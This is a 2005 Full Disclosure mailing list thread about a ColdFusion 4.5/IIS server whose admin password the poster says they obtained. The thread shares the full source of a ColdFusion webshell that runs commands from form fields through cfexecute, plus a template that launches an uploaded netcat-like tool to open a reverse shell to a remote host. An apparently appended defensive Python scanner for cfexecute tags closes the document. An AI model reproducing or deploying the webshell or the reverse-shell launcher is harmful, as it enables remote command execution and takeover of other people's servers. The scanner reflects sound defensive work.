Full Disclosure mailing list archives

Re: coldfusion pentest


From: "fatb" <fatb () security zz ha cn>
Date: Tue, 10 May 2005 17:19:59 +0800

thx :)

The script from securiteam was originally from Kurt Grutzmacher; it could not run on my box,

and I successfully got a working shell by uploading an nc-like tool and using the following script to run it:

<html>
<body>
<cfexecute name="D:\haha.exe"
                 arguments="-connect 1.1.1. 9999"
                 timeout="20">
      </cfexecute>
</body>
</html>

Anyway, I thought many guys like me need a working cf webshell, because the upload script does not allow us to
upload exe or some other kinds of files.



----- Original Message ----- 
From: "Javier Reoyo" <javier.reoyo () interdominios com>
To: <full-disclosure () lists grok org uk>
Sent: Tuesday, May 10, 2005 4:31 PM
Subject: Re: [Full-disclosure] coldfusion pentest


Hi fatb,


this is from mailing of securiteam. Try it.

 ColdFusion Web Shell
------------------------------------------------------------------------


SUMMARY



DETAILS

The following source code will generate a web based shell whenever it is
executed under the ColdFusion environment.

Tool source code:
< html>
< body>

< cfoutput>
< table>
< form method="POST" action="cfexec.cfm">
< tr>
 < td>Command:</td>
 < td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")>
value="#form.cmd#" </cfif>> < br></td>
</tr>
< tr>
 < td>Options:</td>
 < td> < input type=text name="opts" size=50 < cfif
isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td>
</tr>
< tr>
 < td>Timeout:</td>
 < td>< input type=text name="timeout" size=4 < cfif
isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5"
</cfif> > </td>
</tr>
</table>
< input type=submit value="Exec" >
</FORM>

< cfsavecontent variable="myVar">
< cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
"#Form.timeout#">
</cfexecute>
</cfsavecontent>
< pre>
#myVar#
</pre>
</cfoutput>
</body>
</html>


ADDITIONAL INFORMATION

The information has been provided by Kurt Grutzmacher <grutz () jingojango net>.



========================================

----- Original Message ----- 
From: "fatb" <fatb () security zz ha cn>
To: <pen-test () securityfocus com>
Cc: <full-disclosure () lists grok org uk>
Sent: Tuesday, May 10, 2005 4:43 AM
Subject: [Full-disclosure] coldfusion pentest


Hi all guys

I've succeeded in getting the admin's passwd of the web interface

and I can upload any kinds of files to the server

the server is running coldfusion 4.5 with iis 5.0

but I can not find a coldfusion webshell to continue

anybody could be kind enough to send me a working coldfusion webshell

thx in advance!


----------------------------------------------------------------------------
----


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
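
For defenders: both templates in this thread depend on the same tag, cfexecute, so a sweep of the webroot for that tag surfaces either variant. The Python sketch below is an added example, not part of the original messages; the function names, severity labels and sample templates are constructed for illustration.

```python
import os
import re

# Opening <cfexecute ...> tag; CFML is case-insensitive, attributes may wrap.
CFEXECUTE_TAG = re.compile(r"<\s*cfexecute\b([^>]*)>", re.I | re.S)
# attr = "value" or attr = 'value', with optional whitespace around '='.
ATTRIBUTE = re.compile(r"(\w+)\s*=\s*([\"'])(.*?)\2", re.S)
# #scope.var# expressions that read client-controlled request scopes.
REQUEST_SCOPE = re.compile(r"#\s*(?:form|url|cgi|cookie)\.\w+", re.I)

def scan_template(text):
    """Return one finding per cfexecute tag found in a CFML template."""
    findings = []
    for tag in CFEXECUTE_TAG.finditer(text):
        attrs = {k.lower(): v for k, _, v in ATTRIBUTE.findall(tag.group(1))}
        tainted = sorted(a for a in ("name", "arguments")
                         if REQUEST_SCOPE.search(attrs.get(a, "")))
        findings.append({
            "line": text.count("\n", 0, tag.start()) + 1,
            # Request data reaching name/arguments means remote command execution.
            "severity": "high" if tainted else "review",
            "tainted": tainted,
            "name": attrs.get("name", ""),
        })
    return findings

def scan_tree(root, exts=(".cfm", ".cfml", ".cfc")):
    """Walk a webroot and map each template path to its findings."""
    hits = {}
    for folder, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(exts):
                path = os.path.join(folder, fname)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_template(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed samples: request-driven attributes vs. a fixed program path.
SAMPLE_DYNAMIC = '''<cfsavecontent variable="out">
<cfexecute name="#Form.cmd#" arguments="#Form.opts#"
           timeout="#Form.timeout#">
</cfexecute>
</cfsavecontent>
'''
SAMPLE_STATIC = r'<cfexecute name="C:\tools\report.exe" timeout="20"></cfexecute>'

if __name__ == "__main__":
    for label, sample in (("dynamic", SAMPLE_DYNAMIC), ("static", SAMPLE_STATIC)):
        print(label, scan_template(sample))
```

A "review" finding is not automatically benign: a template with a fixed program path that nobody on the team recognises, sitting in an upload directory, deserves the same attention as a "high" one.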
